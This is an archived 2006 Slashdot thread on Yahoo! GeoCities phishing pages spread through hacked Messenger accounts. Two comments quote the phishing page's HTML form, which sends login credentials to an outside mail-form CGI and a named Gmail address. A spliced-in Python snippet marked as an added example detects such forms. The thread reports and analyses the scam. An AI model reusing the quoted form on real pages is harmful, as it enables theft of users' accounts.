Phishing in Yahoo! Geocities?

Van Cutter Romney asks: "I've received a lot of phishing IMs on my Yahoo! Messenger from contacts whose accounts I guess have been hacked into. All the phishing messages lead to Geocities websites like this where the user is displayed a Yahoo! login page. For most people, the page looks legitimate and they enter their Yahoo! username and password (I was nearly fooled once). Since both the website (Geocities) and the messenger belong to Yahoo!, I'd like to know if they are doing anything to counter these attacks."
This discussion has been archived. No new comments can be posted.

  • by Anonymous Coward on Tuesday July 11, 2006 @08:52PM (#15702636)
    Did you report it to Yahoo!? Or just Slashdot?
  • and I quote:

    "NOTICE: We collect personal information on this site."

    Ya think?!?

    I never made the connection! Thanks Mr. Obvious!
  • something to do (Score:4, Interesting)

    by ianpatt ( 52996 ) on Tuesday July 11, 2006 @08:58PM (#15702656)
    For those of you who are bored, you could try to get any of the addresses listed in the web form taken down.

    <FORM METHOD="POST" ACTION="http://www2.fiberbit.net/form/mailto.cgi" ENCTYPE="x-www-form-urlencoded">
    <INPUT TYPE="hidden" NAME="Mail_From" VALUE="Yahoo">
    <INPUT TYPE="hidden" NAME="Mail_To" VALUE="havinfunfun@gmail.com">
    <INPUT TYPE="hidden" NAME="Mail_Subject" VALUE="Yahoo id">

    I'm sure google would have a fun time going after whoever referred havinfunfun@gmail.com.
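Added example, not part of the original thread: the form quoted in the comment above hands the login fields to a form-to-mail CGI on a different host, with the recipient in a hidden field. The sketch below flags that pattern in a page's HTML; the sample pages, hosts and address are constructed placeholders, and `FormAuditor` and `audit` are hypothetical names.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
# Constructed samples: hosts and address are placeholders, not taken from the thread.
LOOKALIKE = """<FORM METHOD="POST" ACTION="http://mailer.example.net/form/mailto.cgi">
<INPUT TYPE="hidden" NAME="Mail_To" VALUE="collector@example.org">
<INPUT NAME="login"><INPUT TYPE="password" NAME="passwd"></FORM>"""
GENUINE = '<form method="post" action="/login"><input type="password" name="p"></form>'

class FormAuditor(HTMLParser):
    """Record each form's action, whether it has a password field, and its hidden inputs."""
    def __init__(self):
        super().__init__()
        self.forms, self._cur = [], None

    def handle_starttag(self, tag, attrs):  # tag and attribute names arrive lowercased
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._cur = {"action": a.get("action", ""), "password": False, "hidden": {}}
            self.forms.append(self._cur)
        elif tag == "input" and self._cur is not None:
            kind = a.get("type", "text").lower()
            self._cur["password"] |= kind == "password"
            if kind == "hidden":
                self._cur["hidden"][a.get("name", "")] = a.get("value", "")

    def handle_endtag(self, tag):
        if tag == "form":
            self._cur = None

def audit(page_url, html):
    """Return one list of reasons per suspicious form found in the page."""
    parser = FormAuditor()
    parser.feed(html)
    page_host, findings = urlsplit(page_url).hostname, []
    for form in parser.forms:
        target, reasons = urlsplit(urljoin(page_url, form["action"])), []
        if form["password"] and target.hostname != page_host:
            reasons.append(f"password form posts off-site to {target.hostname}")
        if form["password"] and target.scheme != "https":
            reasons.append("credentials are submitted without TLS")
        reasons += [f"hidden field {n!r} holds an e-mail address"
                    for n, v in form["hidden"].items() if EMAIL_RE.search(v)]
        if reasons:
            findings.append(reasons)
    return findings
```

Calling `audit(page_url, html)` on a hosted page returns an empty list when every password form posts back to the page's own host over HTTPS and no hidden field carries a mail recipient.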
  • by walnutmon ( 988223 ) on Tuesday July 11, 2006 @08:59PM (#15702659)
    When I was asked for my username, password, and sexual orientation...
  • by Anonymous Coward on Tuesday July 11, 2006 @09:08PM (#15702688)
    and I didn't see anything.

    What gives?

  • by Anonymous Coward on Tuesday July 11, 2006 @09:11PM (#15702696)
    And yet the worst fishing site [geocities.com] on geocities is still up-- since something like 1998? Someone's asleep at the wheel.
    • And yet the worst fishing site on geocities is still up-- since something like 1998? Someone's asleep at the wheel.

      I'll be honest. I spent all that time trying to figure out how the website was trying to scam people out of money. Then I realized that it was nothing more than a pun. Great job and very subtle and it somehow being modded insightful made it even more funny.
  • by Anonymous Coward
    I found it obvious when I right clicked the page and it said Content (C) Flickr...I mean, the site says we are owned by Yahoo! then they claim Flickr owns the content.

    Also consider the SSL link seems to not be phished. I tried dummy data in both login forms and it said "Page Not Found" for the phished page that was not secured, while it said "ID not found" when I entered the information on SSL site. Someone should report the site http://www2.fiberbit.net/ [fiberbit.net] to the domain registrar since the form submissi
  • People who use Flickr rock!
    Not only does Flickr make you smell better, it also makes you more attractive.
  • by The MAZZTer ( 911996 ) <megazzt&gmail,com> on Tuesday July 11, 2006 @09:21PM (#15702737) Homepage

    Username: ohgodatleastspendthe
    Password: $5foradomainname

    The destination page is a 404 (I don't think it works?).

  • old news... (Score:1, Redundant)

    by josepha48 ( 13953 )
    I've known about this since December of 2005.

    You are about 8 months late!

    I initially was told that all you had to do was go to the site, by my roommate, but after a while found out he lied to me, and he logged in like this guy posted.

    I've since got him the netcraft toolbar, which tells and can block you from going to phish sites, or at least warn you about it.

  • Ummm (Score:5, Insightful)

    by Otter ( 3800 ) on Tuesday July 11, 2006 @09:25PM (#15702752) Journal
    Since both the website (Geocities) and the messenger belong to Yahoo!, I'd like to know if they are doing anything to counter these attacks.

    Maybe I'm missing something, but why the hell are you asking us?

    • Maybe I'm missing something, but why the hell are you asking us?

      Maybe he expects us to take them down via the slashdot effect.
  • Terms of service (Score:5, Informative)

    by Spy der Mann ( 805235 ) <spydermann.slashdot@gmail . c om> on Tuesday July 11, 2006 @09:35PM (#15702795) Homepage Journal
    report the webpage and you're done.

    Geocities is a kinda abandoned place (So much that webcomics make fun of it [nyud.net]). There's no customer service, everything's automated there. The only thing that (I hope) isn't, is the "report offensive page" etc. The only change done to it was aesthetic and in the code. But the infrastructure remains.

    In other words, geocities servers do NOT have personnel searching and identifying phishing sites on them. They have to rely on the users.

    (This and popup ads led to the fall of free homepages. Most pages now are categorized in specialized sites: webcomics, blogs, art, fiction, and with youtube, videos).

    This was bound to happen sooner or later. Yahoo neglected geocities, is it a mystery that it became a meeting point for illegal activities?
    • Well they have one of the best Instant Messengers to phish your passwords with. And imagine what happens now that they have your username and password. Do you know how many people have their personal information in Yahoo! Mail?
  • The next version of Geocities will require the user to check a box verifying that he is not a phisher.
  • If you view the source of the form on the phishing site you'll see that email address, it suuuure would be fun to spam that with fake info. Other info from the form that might be useful is:

    Subject: "Yahoo id"
    the URL for the mail form that's used is: http://www2.fiberbit.net/form/mailto.cgi [fiberbit.net]
  • The usernames and passwords might go to a gmail account, but not sure it actually does or not - depends on the mailto.cgi.

    Extract:
    <FORM METHOD="POST" ACTION="http://www2.fiberbit.net/form/mailto.cgi" ENCTYPE="x-www-form-urlencoded">
    <INPUT TYPE="hidden" NAME="Mail_From" VALUE="Yahoo">
    <INPUT TYPE="hidden" NAME="Mail_To" VALUE="havinfunfun@gmail.com">
    <INPUT TYPE="hidden" NAME="Mail_Subject" VALUE="Yahoo
  • Security problems (Score:1, Interesting)

    by Anonymous Coward
    Yahoo! has huge security problems with their accounts. So does Hotmail. I'm not going to get into the details, but let me say this. For my friends and family who forgot their password to their Yahoo! account, it's fairly easy to get their account back for them.
  • yes, we are (Score:3, Informative)

    by Anonymous Coward on Tuesday July 11, 2006 @10:53PM (#15703094)
    While I work for Yahoo! I do not speak for them officially. I do not work on any of the products mentioned.

    We do have teams of people who work to fight any abuse of any of our products. When sites like those are found, they are taken down.

    Please report any instances of situations like those you described to:

    http://abuse.yahoo.com/ [yahoo.com] or abuse@yahoo-inc.com
  • Oh, C'mon!!!... (Score:3, Informative)

    by BlueStrat ( 756137 ) on Wednesday July 12, 2006 @12:54AM (#15703448)
    Who *doesn't* know that Yahoo/Geocities is a major phishing/script-kiddie resource and host?? This isn't news to anyone who has experience chatting in Yahoo chatrooms.

    There are script-kiddies and S/N stealers that constantly use geocities pages to host everything from phishing pages to outright trojan .exe files, disguised as videos or whatever, that they spam links to in yahoo chatrooms with, in an almost constant barrage.

    There is a subgroup of huge-egoed "1337" yahoo chatters that deal in stolen screen names and "illegal" or "illy" names in trade for other names, or straight cash.

    Yahoo seems to pay no attention whatsoever to their abuse reporting system. I've reported a geocities page hosting a trojan multiple times, and the site remained up for over a year, with the same trojan .exe file.

    One of the biggest things driving this subgroup of crackers and script-kiddies are the chat-bot spammers, who buy lists of stolen screen-names/accounts on which to log-on their spam/porn bots. There is an entire underground economy of stolen accounts/screen-names much larger and much older than any of the MMORPG gold trader/seller economies that have gotten so much press of late.

    I think Yahoo, despite all of their denials, are in bed with the spam/porn-bot operators, and turn a blind eye, even protecting them. I know people who chat on Yahoo that run "booter" programs that will kick/flood a chatter out of a room, even completely disconnect someone from Yahoo. They regularly boot normal chatters with impunity, but fear to boot "porn/spam-bots", as Yahoo will quickly shut down the booters' "bot" account(s) (most 'booter' programs utilise 'bots' to send their disconnect packets/IM floods/etc) and even ban the booter-operators' account and block that IP address.

    If I were this fellow, I'd consider myself lucky that the only thing he got from a geocities webpage was a phishing page, as opposed to a virus or trojan with much more serious and far-reaching consequences than having a Yahoo screen-name/account cracked or stolen.

    Cheers!

    Strat
  • by antdude ( 79039 ) on Wednesday July 12, 2006 @01:42AM (#15703572) Homepage Journal
    Yup, I was a victim of this YM phishing because of my dumb user error. Here's my story...

    I wasn't fully awake to notice the URLs because it was the middle of the night. I got a YM IM in my Trillian from someone whom I haven't heard from for months. It went like this (note: actual account/user names changed from their original ones):

    Session Start (ant:onion): Sat Jan 07 02:28:11 2006
    [02:28] onion: Hey check out this website for some photos of me tell me what you think http://www.myphoto-album.tk/ [myphoto-album.tk]
    [02:28] *** Auto-response sent to onion: ant isn't around here at the moment.
    [03:03] ant: I don't see anything even after logging in.
    [03:03] *** You are currently disconnected. Messages will not be received.
    [03:03] *** You are currently disconnected. Messages will not be received.
    [03:04] *** You are currently disconnected. Messages will not be received.
    [03:04] *** You are currently disconnected. Messages will not be received.
    Session Close (onion): Sat Jan 07 03:07:05 2006

    I thought YM servers went down or something. In the day time, it hit me. I got phished! My password was already changed (duh!).

    I quickly e-mailed Yahoo! A few days later, Y! asked for my information that I used to sign up. The problem here was I never used real personal data in online accounts like Y! nor do I remember them. Plus, I signed up for my account like a decade ago.

    My buddies on the contact list (had a local back up copy so easy to contact) all got this phish. I already warned them not to reply. But some of them were too late and actually fell for it.

    I continued to e-mail Y!, but got nowhere. I eventually gave up and told them to shut down my account. However, Y! still refused. Of course, my buddies saw the fake me and phish IMs. Eventually, I told all my buddies to fill out the online abuse forms to Yahoo!'s abuse department to shut down my account for phishing. Then, I never heard of more online sightings and phishings from my account.

    Here were two Web sites that were for collecting passwords (also contacted the hosts about my incidents). These fake Y!'s GeoCities were gone within days:
    www.my-photo-albums.tk
    www.myphoto-album.tk

    I was glad I didn't use Yahoo account other than IM and launch.com. I hate these bundled services within a single account like Passport. :(

    As you can see, social engineering at its best even on people who know computers. I fell for it. :(
  • You could also send the info to the site below. I've been sending them a lot of my email phish and they seem to be pretty active in getting sites taken down. Thank goodness! My Dad had a PayPal phish the other day that said something like "confirm you submitted this payment blahblah" for some item he hadn't actually bought. The scary thing was, the phish email actually had his real name in it. Luckily, the phish site had already been taken down when he tried to go to it to give them his PayPal info...

    h [castlecops.com]
